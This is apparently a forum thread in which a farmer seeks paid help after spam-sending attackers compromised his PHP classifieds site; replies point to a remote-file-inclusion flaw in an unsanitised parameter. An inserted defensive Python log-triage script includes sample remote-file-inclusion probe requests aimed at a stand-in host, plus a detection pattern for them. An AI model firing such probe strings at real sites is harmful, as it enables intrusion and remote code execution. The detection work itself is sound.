Topic: PHP guns for hire?

Hey, I have a website that I need some help with. Are there any robots with PHP and other programming skills?

I can pay.

Re: PHP guns for hire?

Do you have more specifics about the site and what you are trying to do with it?

worship the potentiometer.

Re: PHP guns for hire?

Well, I have a classified ad site for farmers (I am a farmer), nothing fancy, just a simple site. It has been hacked, however, and the hosting company have suspended it for sending out spam.

I need someone to look through the logs and script and find the problem. If anyone has got the skills to tackle this, please let me know.

I can provide the logs and access to control panel in PM to whoever can help.

Here is what the hosting company have said

"It looks like you have some php files that are vulnerable to cross-site scripting or remote file inclusion exploits, but we haven't been able to find the definite exact cause or file."

Remember that I will pay whoever can help.

Re: PHP guns for hire?

Serious stuff, robototitico... Who made the PHP site in the first place? Is it some sort of FOSS/commercial package or made by someone in particular?

Re: PHP guns for hire?

The script is the xzero classifieds script - www.xzeroscripts.com

Someone on getafreelancer.com purchased and installed it for me.

Re: PHP guns for hire?

it sounds like you need to log into your ftp so you can get to the files and secure some of them. it varies from product to product, but usually you have to set permissions once the site is set up so certain files can't be hacked.

on my ftp program (fetch) you just click the file and click "get info" and it will list permissions for the files. there are 3 sets: Owner, Group, Others and each one has 3 check boxes: Read, Write, Execute.

Once you figure out which files to secure, you want to only make the Owner have all three check boxes checked and the others set to Read. It should have a number associated with it like 644 or 744 or something.

I'm pretty sure that will take care of the problem. I imagine the forum on www.xzeroscripts.com has someone who has run into this as well.

worship the potentiometer.

Re: PHP guns for hire?

That didn't fix it. The people I've talked to on www.xzeroscripts.com don't want to touch this with a barge pole either.

8 (edited by robototitico 2009-01-19 16:58:31)

Re: PHP guns for hire?

Here's what the hosting company said:

Hi Philip

We've had to suspend that account again. It looks like you have some php files that are vulnerable to cross-site scripting or remote file inclusion exploits, but we haven't been able to find the definite exact cause or file.

Because your site is attempting to flood our mail server with connections, we'll have to keep the site suspended 'till the issue is found.

Maybe the person who installed the site might be able to tell where the following log entries are being called from:

If you could ask them what php files are called when any of the above URLs are entered, it might help us track down the problem.

Regards
Jason

Re: PHP guns for hire?

What, those guys said to you that they don't want to touch it with a pole??? I mean, they made it...

Re: PHP guns for hire?

Well, I put a message on the forum. And two guys offered to help. One said that the job is too messy and he's not willing to help. The other guy is still deciding.

Re: PHP guns for hire?

In general, I'd give the following advice: "hacked" is a very broad term, this can be anything... Could be a bug in the installation, in the software itself, insecure passwords, whatever... If it's a bug in the software, can be SQL injection, file upload vulnerability, remote file inclusion, XSS, just to name a few. The safest bet in general is to have someone knowledgeable have a close look at your particular situation and figure out the attack vector. No offense to screenvinylimage - but I think that advice goes a bit too short. Just fiddling around with the permissions, without knowing what's going on, and expecting that things will be magically "fixed" is a rather naive approach. Chances are higher that you'll fuck up your setup for good, rather than fixing the hole in the system.

In this case, however, I bet the scenario is the following: the scripts you're using have a security hole that allows for a remote file inclusion exploit. In particular, certain GET variables such as path_escape are not properly sanitized. This looks like the original authors are to blame, and your particular install is sane. But no guarantees, the data you've provided is very sparse. I'm sorry I don't have the resources to delve into this case any further.
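As an added example (not code from this thread, the xzero script, or the hosting company): a small Python triage of an access log that flags requests whose query parameters carry a remote URL, which is the remote-file-inclusion pattern maurits describes, and groups them into the list the host asked for, the scripts and parameter names to audit. The log lines, client addresses and host names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (hypothetical addresses and hosts), modelled
# on the shape of the probes the host quoted: a query value that is a full URL.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jan/2009:16:58:31 +0000] "GET /config.inc.php?path_escape=http://rfi-host.example/v6id.txt?? HTTP/1.1" 200 512
203.0.113.5 - - [19/Jan/2009:16:58:32 +0000] "GET /6/errors.php?error=http://rfi-host.example/idxx.txt?? HTTP/1.1" 200 512
203.0.113.5 - - [19/Jan/2009:16:58:33 +0000] "GET /6//?path%5Bdocroot%5D=http://rfi-host.example/idxx.txt?? HTTP/1.1" 200 512
203.0.113.5 - - [19/Jan/2009:16:58:34 +0000] "GET /index.php?news_id=3&arcmonth=/config.inc.php?path_escape=http://rfi-host.example/v6id.txt?? HTTP/1.1" 200 512
198.51.100.7 - - [19/Jan/2009:17:01:00 +0000] "GET /index.php?news_id=3&start=0 HTTP/1.1" 200 2048
198.51.100.7 - - [19/Jan/2009:17:01:05 +0000] "GET /posts/19_Eating_Local/ HTTP/1.1" 200 1024
"""

# Request line inside a common/combined log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that is (or embeds) an absolute URL is the RFI signature:
# include($_GET['x']) would fetch it when PHP allows URL includes.
REMOTE_RE = re.compile(r'(?:https?|ftp)://[^\s"\']+', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return (client_ip, requested_path, param_name, remote_url) for every request
    whose query string carries a remote URL. parse_qsl percent-decodes names, so
    path%5Bdocroot%5D is reported as path[docroot]. A URL nested behind a second
    '?' (the /index.php line) is attributed to the outer parameter that carried it."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(' ', 1)[0]
        parts = urlsplit(m.group('target'))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            url = REMOTE_RE.search(value)
            if url:
                hits.append((client, parts.path, name, url.group(0)))
    return hits


def scripts_to_audit(hits):
    """Map each injectable parameter name to the set of requested paths it was sent
    to. A path ending in '/' is a directory index, so a rewrite rule or DirectoryIndex
    setting decides which PHP file actually ran; that file is the one to read."""
    out = {}
    for _, path, name, _ in hits:
        out.setdefault(name, set()).add(path)
    return out
```

Running `scripts_to_audit(find_rfi_attempts(SAMPLE_LOG))` gives the parameter-to-script map the host wanted, and greps of the application source for each parameter name then lead to the include() or require() that consumes it unchecked.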

Re: PHP guns for hire?

maurits wrote:

No offense to screenvinylimage - but I think that advice goes a bit too short. Just fiddling around with the permissions, without knowing what's going on, and expecting that things will be magically "fixed" is a rather naive approach. Chances are higher that you'll fuck up your setup for good, rather than fixing the hole in the system.

I should have clarified that typically CMS installs will tell you which files to secure once you have installed the system on your server. It isn't just random fiddling.

maurits is right, it could be more complex than just a permissions error; I just usually find permissions settings a good starting point. You could also do some Google searching and see if others had the same hack problem you had and what the solution was to fix the problem.

worship the potentiometer.